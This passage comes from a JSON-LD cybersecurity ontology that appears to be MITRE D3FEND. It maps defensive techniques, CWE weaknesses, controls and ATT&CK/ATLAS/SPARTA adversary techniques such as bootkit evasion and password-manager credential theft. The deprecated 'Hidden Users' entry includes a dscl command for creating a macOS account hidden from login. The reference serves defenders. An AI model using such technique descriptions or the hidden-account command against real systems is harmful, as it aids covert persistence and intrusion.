may circumvent outbound traffic filtering technology which does not detect application protocol based on traffic content.\n* Business requirements typically drive the development of filtering rule sets.\n\n## Implementations\n- iptables (Linux)\n- Windows Firewall\n- pf (BSD)",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-AutomaticallyGeneratingRulesForConnectionSecurity_Microsoft"
      },
      "rdfs:label": "Outbound Traffic Filtering",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:NetworkTrafficFiltering"
        },
        {
          "@id": "_:Na08dcb0fd7164e109e5ca499ddbdcf2a"
        }
      ]
    },
    {
      "@id": "_:Na08dcb0fd7164e109e5ca499ddbdcf2a",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:filters"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OutboundNetworkTraffic"
      }
    },
    {
      "@id": "d3f:ImageCodeSegment",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:contains": {
        "@id": "d3f:Subroutine"
      },
      "d3f:definition": "An image code segment, also known as a text segment or simply as text, is a portion of an object file that contains executable instructions. The term \"segment\" comes from the memory segment, which is a historical approach to memory management that has been succeeded by paging. When a program is stored in an object file, the code segment is a part of this file; when the loader places a program into memory so that it may be executed, various memory regions are allocated (in particular, as pages), corresponding to both the segments in the object files and to segments only needed at run time. For example, the code segment of an object file is loaded into a corresponding code segment in memory.",
      "rdfs:label": "Image Code Segment",
      "rdfs:seeAlso": [
        {
          "@id": "d3f:ProcessCodeSegment"
        },
        {
          "@id": "dbr:Code_segment"
        }
      ],
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ImageSegment"
        },
        {
          "@id": "_:N03a2908125fd4de7a40a69c7a9d8aa2c"
        }
      ]
    },
    {
      "@id": "_:N03a2908125fd4de7a40a69c7a9d8aa2c",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Subroutine"
      }
    },
    {
      "@id": "d3f:DS0004",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ATTACKEnterpriseDataSource"
      ],
      "d3f:definition": "Information obtained (via shared or submitted samples) regarding malicious software (droppers, backdoors, etc.) used by adversaries",
      "d3f:narrower": [
        {
          "@id": "d3f:FileHash"
        },
        {
          "@id": "d3f:ImageCodeSegment"
        }
      ],
      "rdfs:comment": "The digital artifact mapping for this data source is only applicable to the Scheduled Job Metadata component",
      "rdfs:label": "Malware Repository (ATT&CK DS)"
    },
    {
      "@id": "d3f:CWE-786",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-786",
      "d3f:definition": "The product reads or writes to a buffer using an index or pointer that references a memory location prior to the beginning of the buffer.",
      "rdfs:label": "Access of Memory Location Before Start of Buffer",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-119"
      }
    },
    {
      "@id": "d3f:CWE-220",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-220",
      "d3f:definition": "The product stores sensitive data under the FTP server root with insufficient access control, which might make it accessible to untrusted parties.",
      "rdfs:label": "Storage of File With Sensitive Data Under FTP Root",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-552"
      }
    },
    {
      "@id": "d3f:DE-0008",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "DE-0008",
      "d3f:definition": "A bootkit hides activity by running first and shaping what higher layers will later observe. Positioned in boot ROM handoff or early loaders, it can select or patch images in memory, alter device trees and driver tables, seed forged counters and timestamps, and preconfigure telemetry/crypto modes so subsequent components launch into a reality curated by the attacker. Because integrity and logging mechanisms are initialized afterward, the resulting view of processes, files, and histories reflects the bootkit’s choices, allowing long-term evasion that persists across resets and mode transitions.",
      "d3f:modifies": {
        "@id": "d3f:BootLoader"
      },
      "rdfs:label": "Evasion via Bootkit - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/DE-0008/"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:SPARTADefenseEvasionTechnique"
        },
        {
          "@id": "_:N93ba8ca061da404aa21cd1020371afa4"
        }
      ],
      "skos:prefLabel": "Evasion via Bootkit"
    },
    {
      "@id": "_:N93ba8ca061da404aa21cd1020371afa4",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:BootLoader"
      }
    },
    {
      "@id": "d3f:T1159",
      "@type": "owl:Class",
      "d3f:attack-id": "T1159",
      "d3f:definition": "Per Apple’s developer documentation, when a user logs in, a per-user launchd process is started which loads the parameters for each launch-on-demand user agent from the property list (plist) files found in <code>/System/Library/LaunchAgents</code>, <code>/Library/LaunchAgents</code>, and <code>$HOME/Library/LaunchAgents</code> (Citation: AppleDocs Launch Agent Daemons) (Citation: OSX Keydnap malware) (Citation: Antiquated Mac Malware). These launch agents have property list files which point to the executables that will be launched (Citation: OSX.Dok Malware).",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1543.001",
      "rdfs:label": "Launch Agent",
      "rdfs:seeAlso": {
        "@id": "d3f:T1543.001"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:PersistenceTechnique"
      }
    },
    {
      "@id": "d3f:T1032",
      "@type": "owl:Class",
      "d3f:attack-id": "T1032",
      "d3f:definition": "Adversaries may explicitly employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if necessary secret keys are encoded and/or generated within malware samples/configuration files.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1573",
      "rdfs:label": "Standard Cryptographic Protocol",
      "rdfs:seeAlso": {
        "@id": "d3f:T1573"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:CommandAndControlTechnique"
      }
    },
    {
      "@id": "d3f:T1615",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1615",
      "d3f:definition": "Adversaries may gather information on Group Policy settings to identify paths for privilege escalation, security measures applied within a domain, and to discover patterns in domain objects that can be manipulated or used to blend in the environment. Group Policy allows for centralized management of user and computer settings in Active Directory (AD). Group policy objects (GPOs) are containers for group policy settings made up of files stored within a predictable network path `\\<DOMAIN>\\SYSVOL\\<DOMAIN>\\Policies\\`.(Citation: TechNet Group Policy Basics)(Citation: ADSecurity GPO Persistence 2016)",
      "d3f:reads": {
        "@id": "d3f:GroupPolicy"
      },
      "rdfs:label": "Group Policy Discovery",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DiscoveryTechnique"
        },
        {
          "@id": "_:N70f46a51672246b881fbf3d30aa59f10"
        }
      ]
    },
    {
      "@id": "_:N70f46a51672246b881fbf3d30aa59f10",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:reads"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:GroupPolicy"
      }
    },
    {
      "@id": "d3f:addresses",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x addresses y: Relates a pointer x to a digital artifact y located in the address space to which x points. The address space is part of some digital store, whether it be in memory, an image, or a persistent storage device.",
      "rdfs:label": "addresses",
      "rdfs:seeAlso": [
        {
          "@id": "dbr:Pointer_(computer_programming)"
        },
        {
          "@id": "http://wordnet-rdf.princeton.edu/id/02253826-v"
        }
      ],
      "rdfs:subPropertyOf": {
        "@id": "d3f:associated-with"
      },
      "skos:altLabel": "points-to"
    },
    {
      "@id": "d3f:CWE-317",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-317",
      "d3f:definition": "The product stores sensitive information in cleartext within the GUI.",
      "rdfs:label": "Cleartext Storage of Sensitive Information in GUI",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-312"
      }
    },
    {
      "@id": "d3f:Moments",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-MOM",
      "d3f:definition": "With a probability distribution function, the the first moment is the expected value, the second central moment is the variance, the third standardized moment is the skewness, and the fourth standardized moment is the kurtosis.",
      "d3f:kb-article": "## References\nWikipedia. (n.d.). Moment (mathematics). [Link](https://en.wikipedia.org/wiki/Moment_(mathematics))",
      "rdfs:label": "Moments",
      "rdfs:subClassOf": {
        "@id": "d3f:DistributionProperties"
      }
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_MA-3_3",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Maintenance Tools | Prevent Unauthorized Removal",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "d3f:narrower": {
        "@id": "d3f:UserAccountPermissions"
      },
      "rdfs:label": "MA-3(3)"
    },
    {
      "@id": "d3f:TimeInterval",
      "@type": "owl:Class",
      "d3f:definition": "A time interval is a one-dimensional temporal region that has duration and represents a continuous extent of time bounded by two time instants (a start instant and an end instant).",
      "rdfs:label": "Time Interval",
      "rdfs:subClassOf": {
        "@id": "d3f:Time"
      }
    },
    {
      "@id": "d3f:enforces",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x enforces y: Technique x forces entity y to be compliant with a law, rule, or obligation.",
      "rdfs:label": "enforces",
      "rdfs:subPropertyOf": {
        "@id": "d3f:associated-with"
      }
    },
    {
      "@id": "d3f:CWE-1193",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1193",
      "d3f:definition": "The product enables components that contain untrusted firmware before memory and fabric access controls have been enabled.",
      "rdfs:label": "Power-On of Untrusted Execution Core Before Enabling Fabric Access Control",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-696"
      }
    },
    {
      "@id": "d3f:Reference-ComputerWormDefenseSystemAndMethod_FireEyeInc",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US20130036472A1"
      },
      "d3f:kb-abstract": "\"A computer worm defense system comprises multiple containment systems tied together by a management system. Each containment system is deployed on a separate communication network and contains a worm sensor and a blocking system. In various embodiments, the computer worm may be transported from a production network, where the computer worm is not readily identifiable, to an alternate network in the worm sensor where the computer worm may be readily identifiable. Computer worm identifiers generated by a worm sensor of one containment system can be provided not only to the blocking system of the same containment system, but can also be distributed by the management system to blocking systems of other containment systems.\"",
      "d3f:kb-author": "Ashar Aziz",
      "d3f:kb-mitre-analysis": "This patent describes network data being copied by a tap and then analyzed in an analysis environment to determine whether the network data is suspicious using a heuristic module. The analysis environment replays transmission of the suspicious network data between a configured replayer and a virtual machine to detect unauthorized activity.",
      "d3f:kb-organization": "FireEye Inc",
      "d3f:kb-reference-of": {
        "@id": "d3f:FileCarving"
      },
      "d3f:kb-reference-title": "Computer Worm Defense System and Method",
      "rdfs:label": "Reference - Computer Worm Defense System and Method - FireEye Inc"
    },
    {
      "@id": "d3f:FileAccessPatternAnalysis",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:FileAccessPatternAnalysis"
      ],
      "d3f:analyzes": {
        "@id": "d3f:LocalResourceAccess"
      },
      "d3f:d3fend-id": "D3-FAPA",
      "d3f:definition": "Analyzing the files accessed by a process to identify unauthorized activity.",
      "d3f:kb-article": "## How it works\nFile-modifying malware such as wipers and ransomware is detected by identifying file access patterns that are associated with a malicious process. Examples of file access patterns include accessing a large number of files, accessing multiple file types, accessing files in multiple locations in a directory, and copying a file and encrypting the contents of that file into a copy.\n\n## Considerations\nCertain file access actions may not be statistically different from authorized activity; for example, backup or bulk-archiving tools also access many files of many types across many locations.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-File-modifyingMalwareDetection_CrowdstrikeInc"
      },
      "rdfs:label": "File Access Pattern Analysis",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ProcessAnalysis"
        },
        {
          "@id": "_:N64c1628091cf475fb397bf64987a2816"
        }
      ]
    },
    {
      "@id": "_:N64c1628091cf475fb397bf64987a2816",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:analyzes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:LocalResourceAccess"
      }
    },
    {
      "@id": "d3f:CWE-305",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-305",
      "d3f:definition": "The authentication algorithm is sound, but the implemented mechanism can be bypassed as the result of a separate weakness that is primary to the authentication error.",
      "rdfs:label": "Authentication Bypass by Primary Weakness",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1390"
      }
    },
    {
      "@id": "d3f:UserAccountEnableEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where a user account is enabled, granting it active use within the system.",
      "rdfs:label": "User Account Enable Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:UserAccountEvent"
        },
        {
          "@id": "_:N48743198694242438a9139793a352542"
        }
      ]
    },
    {
      "@id": "_:N48743198694242438a9139793a352542",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:UserAccountCreationEvent"
      }
    },
    {
      "@id": "d3f:ProximitySensorMonitoring",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:ProximitySensorMonitoring"
      ],
      "d3f:d3fend-id": "D3-PSM",
      "d3f:definition": "Monitoring events from proximity sensors that indicate a credential or tagged asset is within the sensor’s read range or a defined zone. Common enabling technologies include RFID, Bluetooth Low Energy (BLE), and Ultra-Wideband (UWB).",
      "d3f:kb-article": "## How it works\n\nProximity readers and sensors detect credentials or tagged assets within their read field, then report presence and, when applicable, authenticate to a controller for access decisions. Systems may use RSSI, dwell time, or time-of-flight to enforce zones and policies such as anti-passback. Secure, authenticated communication between readers and controllers helps prevent cloning and replay attacks.\n\n## Considerations\n\n* Place readers and align antennas to achieve consistent read ranges; account for materials like metal and liquids that can detune signals.\n* Use cryptographic credentials with mutual authentication and encrypted, supervised reader links to mitigate cloning and relay attacks.\n* Protect privacy by minimizing collected data, limiting retention, and restricting access to proximity logs.\n* Calibrate detection thresholds and zone boundaries; re-test after layout changes or equipment moves.\n* Monitor reader and tag health, including battery status for BLE and UWB tags and supervision signals for wired and wireless devices.",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-FIPS-201-3"
        },
        {
          "@id": "d3f:Reference-NIST-SP800-116r1"
        },
        {
          "@id": "d3f:Reference-Wikipedia-ProximityCard"
        },
        {
          "@id": "d3f:Reference-Wikipedia-RFID"
        }
      ],
      "d3f:monitors": {
        "@id": "d3f:ProximitySensor"
      },
      "d3f:synonym": [
        "Proximity Reader Monitoring",
        "RFID Reader Monitoring"
      ],
      "rdfs:label": "Proximity Sensor Monitoring",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:PhysicalAccessMonitoring"
        },
        {
          "@id": "_:N04a664c391894477bdd0ed23be42b52e"
        }
      ]
    },
    {
      "@id": "_:N04a664c391894477bdd0ed23be42b52e",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:monitors"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ProximitySensor"
      }
    },
    {
      "@id": "d3f:CWE-416",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-416",
      "d3f:definition": "The product reuses or references memory after it has been freed. At some point afterward, the memory may be allocated again and saved in another pointer, while the original pointer references a location somewhere within the new allocation. Any operations using the original pointer are no longer valid because the memory \"belongs\" to the code that operates on the new pointer.",
      "d3f:synonym": [
        "Dangling pointer",
        "UAF",
        "Use-After-Free"
      ],
      "rdfs:label": "Use After Free",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-825"
      }
    },
    {
      "@id": "d3f:cwe-id",
      "@type": "owl:AnnotationProperty",
      "rdfs:label": "cwe-id",
      "rdfs:subPropertyOf": {
        "@id": "d3f:cwe-kb-annotation"
      }
    },
    {
      "@id": "d3f:kb-mitre-analysis",
      "@type": "owl:AnnotationProperty",
      "d3f:definition": "x kb-mitre-analysis y: The reference x has the mitre d3fend analysis y.",
      "rdfs:domain": {
        "@id": "d3f:TechniqueReference"
      },
      "rdfs:label": "kb-mitre-analysis",
      "rdfs:range": {
        "@id": "xsd:string"
      },
      "rdfs:subPropertyOf": {
        "@id": "d3f:d3fend-kb-annotation-property"
      }
    },
    {
      "@id": "d3f:LocalAuthorizationService",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:authorizes": {
        "@id": "d3f:LocalUserAccount"
      },
      "d3f:definition": "A local authorization service running on a host can authorize a user logged into just that local host computer.",
      "rdfs:label": "Local Authorization Service",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:AuthorizationService"
        },
        {
          "@id": "_:N332e1788ef5943a484accfdb56f34840"
        }
      ]
    },
    {
      "@id": "_:N332e1788ef5943a484accfdb56f34840",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:authorizes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:LocalUserAccount"
      }
    },
    {
      "@id": "d3f:AML.T0012",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0012",
      "d3f:definition": "Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access.\nCredentials may take the form of usernames and passwords of individual user accounts or API keys that provide access to various AI resources and services.\n\nCompromised credentials may provide access to additional AI artifacts and allow the adversary to perform [Discover AI Artifacts](/techniques/AML.T0007).\nCompromised credentials may also grant an adversary increased privileges such as write access to AI artifacts used during development or production.",
      "rdfs:label": "Valid Accounts - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0012"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATLASInitialAccessTechnique"
      },
      "skos:prefLabel": "Valid Accounts"
    },
    {
      "@id": "d3f:OTCreateNewControlProgramCommand",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Commands a remote device to create a control program.",
      "d3f:has-participant": {
        "@id": "d3f:OTControlProgram"
      },
      "rdfs:comment": "GE-SRTP: WRITE PROGRAM BLOCK MEMORY\nGE-SRTP: SET CONTROL ID(CPU ID)\nGE-SRTP: PROGRAM LOAD (DOWNLOAD TO PLC)\nGE-SRTP: TOGGLE FORCE SYSTEM MEMORY",
      "rdfs:label": "OT Create New Control Program Command",
      "rdfs:seeAlso": [
        {
          "@id": "https://icscsi.org/library/Documents/ICS_Protocols/Control%20Microsystems%20-%20DNP3%20User%20and%20Reference%20Manual.pdf"
        },
        {
          "@id": "https://modbus.org/docs/Modbus_Application_Protocol_V1_1b3.pdf"
        },
        {
          "@id": "https://nvlpubs.nist.gov/nistpubs/TechnicalNotes/NIST.TN.2023.pdf"
        }
      ],
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OTModifyControlProgramCommand"
        },
        {
          "@id": "_:N9e04f27d8b124ebab5d8adef59d1b415"
        }
      ]
    },
    {
      "@id": "_:N9e04f27d8b124ebab5d8adef59d1b415",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTControlProgram"
      }
    },
    {
      "@id": "d3f:T1555.005",
      "@type": "owl:Class",
      "d3f:attack-id": "T1555.005",
      "d3f:definition": "Adversaries may acquire user credentials from third-party password managers.(Citation: ise Password Manager February 2019) Password managers are applications designed to store user credentials, normally in an encrypted database. Credentials are typically accessible after a user provides a master password that unlocks the database. After the database is unlocked, these credentials may be copied to memory. These databases can be stored as files on disk.(Citation: ise Password Manager February 2019)",
      "rdfs:label": "Password Managers",
      "rdfs:subClassOf": {
        "@id": "d3f:T1555"
      }
    },
    {
      "@id": "d3f:Reference-Wikipedia-RFID",
      "@type": [
        "owl:NamedIndividual",
        "d3f:InternetArticleReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://en.wikipedia.org/wiki/RFID"
      },
      "d3f:kb-abstract": "General overview of radio-frequency identification systems, tags, readers, and security considerations.",
      "d3f:kb-author": "Wikipedia contributors",
      "d3f:kb-reference-of": {
        "@id": "d3f:ProximitySensorMonitoring"
      },
      "d3f:kb-reference-title": "RFID",
      "rdfs:label": "Reference - Wikipedia: RFID"
    },
    {
      "@id": "d3f:CCI-002205_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system uniquely identifies and authenticates source by organization, system, application, and/or individual for information transfer.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:DomainTrustPolicy"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-06-24T00:00:00"
      },
      "rdfs:label": "CCI-002205"
    },
    {
      "@id": "d3f:Reference-ComputingApparatusWithAutomaticIntegrityReferenceGenerationAndMaintenance_Tripwire,Inc.",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US20040060046A1"
      },
      "d3f:kb-abstract": "An apparatus is equipped to automatically update one or more integrity references of a software entity, when the software entity is installed onto the apparatus. The apparatus is further equipped to periodically determine whether the integrity of the apparatus has been compromised based at least in part on the one or more integrity references of the software entity that are automatically updated during installation of the software entity.",
      "d3f:kb-author": "Thomas Good, Robert DiFalco, Gene Kim",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "Tripwire, Inc.",
      "d3f:kb-reference-of": {
        "@id": "d3f:ExecutableAllowlisting"
      },
      "d3f:kb-reference-title": "Computing apparatus with automatic integrity reference generation and maintenance",
      "rdfs:label": "Reference - Computing apparatus with automatic integrity reference generation and maintenance - Tripwire, Inc."
    },
    {
      "@id": "d3f:AML.T0073",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0073",
      "d3f:definition": "Adversaries may impersonate a trusted person or organization in order to persuade and trick a target into performing some action on their behalf. For example, adversaries may communicate with victims (via [Phishing](/techniques/AML.T0052), or [Spearphishing via Social Engineering LLM](/techniques/AML.T0052.000)) while impersonating a known sender such as an executive, colleague, or third-party vendor. Established trust can then be leveraged to accomplish an adversary's ultimate goals, possibly against multiple victims.\n\nAdversaries may target resources that are part of the AI DevOps lifecycle, such as model repositories, container registries, and software registries.",
      "rdfs:label": "Impersonation - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0073"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATLASDefenseEvasionTechnique"
      },
      "skos:prefLabel": "Impersonation"
    },
    {
      "@id": "d3f:TestExecutionTool",
      "@type": "owl:Class",
      "d3f:definition": "A test execution tool is a type of software used to test software, hardware or complete systems.  Synonyms of test execution tool include test execution engine, test executive, test manager, test sequencer.  Two common forms in which a test execution engine may appear are as a: (a) module of a test software suite (test bench) or an integrated development environment, or (b) stand-alone application software.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Test_execution_engine"
      },
      "rdfs:label": "Test Execution Tool",
      "rdfs:subClassOf": {
        "@id": "d3f:DeveloperApplication"
      },
      "skos:altLabel": [
        "Test Execution Engine",
        "Test Executive",
        "Test Manager"
      ]
    },
    {
      "@id": "d3f:CWE-449",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-449",
      "d3f:definition": "The UI performs the wrong action with respect to the user's request.",
      "rdfs:label": "The UI Performs the Wrong Action",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-446"
      }
    },
    {
      "@id": "d3f:T1599",
      "@type": "owl:Class",
      "d3f:attack-id": "T1599",
      "d3f:definition": "Adversaries may bridge network boundaries by compromising perimeter network devices or internal devices responsible for network segmentation. Breaching these devices may enable an adversary to bypass restrictions on traffic routing that otherwise separate trusted and untrusted networks.",
      "rdfs:label": "Network Boundary Bridging",
      "rdfs:subClassOf": {
        "@id": "d3f:DefenseEvasionTechnique"
      }
    },
    {
      "@id": "d3f:T1612",
      "@type": "owl:Class",
      "d3f:attack-id": "T1612",
      "d3f:definition": "Adversaries may build a container image directly on a host to bypass defenses that monitor for the retrieval of malicious images from a public registry. A remote <code>build</code> request may be sent to the Docker API that includes a Dockerfile that pulls a vanilla base image, such as alpine, from a public or local registry and then builds a custom image upon it.(Citation: Docker Build Image)",
      "rdfs:label": "Build Image on Host",
      "rdfs:subClassOf": {
        "@id": "d3f:DefenseEvasionTechnique"
      }
    },
    {
      "@id": "d3f:CCI-001082_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:broader": [
        {
          "@id": "d3f:LocalFilePermissions"
        },
        {
          "@id": "d3f:SystemConfigurationPermissions"
        }
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system separates user functionality (including user interface services) from information system management functionality.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-21T00:00:00"
      },
      "rdfs:label": "CCI-001082"
    },
    {
      "@id": "d3f:CyberAction",
      "@type": "owl:Class",
      "rdfs:label": "Cyber Action",
      "rdfs:subClassOf": {
        "@id": "d3f:Action"
      }
    },
    {
      "@id": "d3f:CCI-001557_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:broader": {
        "@id": "d3f:NetworkTrafficAnalysis"
      },
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system tracks problems associated with the information transfer.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2010-05-11T00:00:00"
      },
      "rdfs:label": "CCI-001557"
    },
    {
      "@id": "d3f:SPARTAExecutionTechnique",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:enables": {
        "@id": "d3f:ST0004"
      },
      "rdfs:label": "Execution Technique - SPARTA",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:SPARTATechnique"
        },
        {
          "@id": "_:N54892dbe86f444009ccc73fd9ddf8ef6"
        }
      ],
      "skos:prefLabel": "Execution Technique"
    },
    {
      "@id": "_:N54892dbe86f444009ccc73fd9ddf8ef6",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ST0004"
      }
    },
    {
      "@id": "d3f:T1548",
      "@type": "owl:Class",
      "d3f:attack-id": "T1548",
      "d3f:definition": "Adversaries may circumvent mechanisms designed to control elevated privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk.(Citation: TechNet How UAC Works)(Citation: sudo man page 2018) An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.(Citation: OSX Keydnap malware)(Citation: Fortinet Fareit)",
      "rdfs:label": "Abuse Elevation Control Mechanism",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DefenseEvasionTechnique"
        },
        {
          "@id": "d3f:PrivilegeEscalationTechnique"
        }
      ]
    },
    {
      "@id": "d3f:CWE-573",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-573",
      "d3f:definition": "The product does not follow or incorrectly follows the specifications as required by the implementation language, environment, framework, protocol, or platform.",
      "rdfs:label": "Improper Following of Specification by Caller",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-710"
      }
    },
    {
      "@id": "d3f:CWE-148",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-148",
      "d3f:definition": "The product does not properly handle when a leading character or sequence (\"leader\") is missing or malformed, or if multiple leaders are used when only one should be allowed.",
      "rdfs:label": "Improper Neutralization of Input Leaders",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-138"
      }
    },
    {
      "@id": "d3f:T1147",
      "@type": "owl:Class",
      "d3f:attack-id": "T1147",
      "d3f:definition": "Every user account in macOS has a userID associated with it. When creating a user, you can specify the userID for that account. There is a property value in <code>/Library/Preferences/com.apple.loginwindow</code> called <code>Hide500Users</code> that prevents users with userIDs 500 and lower from appearing at the login screen. By using the [Create Account](https://attack.mitre.org/techniques/T1136) technique with a userID under 500 and enabling this property (setting it to Yes), an adversary can hide their user accounts much more easily: <code>sudo dscl . -create /Users/username UniqueID 401</code> (Citation: Cybereason OSX Pirrit).",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1564.002",
      "rdfs:label": "Hidden Users",
      "rdfs:seeAlso": {
        "@id": "d3f:T1564.002"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:DefenseEvasionTechnique"
      }
    },
    {
      "@id": "d3f:UserAction",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "An action performed by a user. Executing commands, granting permissions, and accessing resources are examples of user actions.",
      "d3f:records": {
        "@id": "d3f:Action"
      },
      "rdfs:label": "User Action",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DigitalInformationBearer"
        },
        {
          "@id": "_:N8deb014e499343eea2316c51f55ed7eb"
        }
      ]
    },
    {
      "@id": "_:N8deb014e499343eea2316c51f55ed7eb",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:records"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Action"
      }
    },
    {
      "@id": "d3f:CCI-002423_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system implements cryptographic mechanisms to protect message externals (e.g., message headers and routing information) unless otherwise protected by organization-defined alternative physical safeguards.",
      "d3f:member-of": {
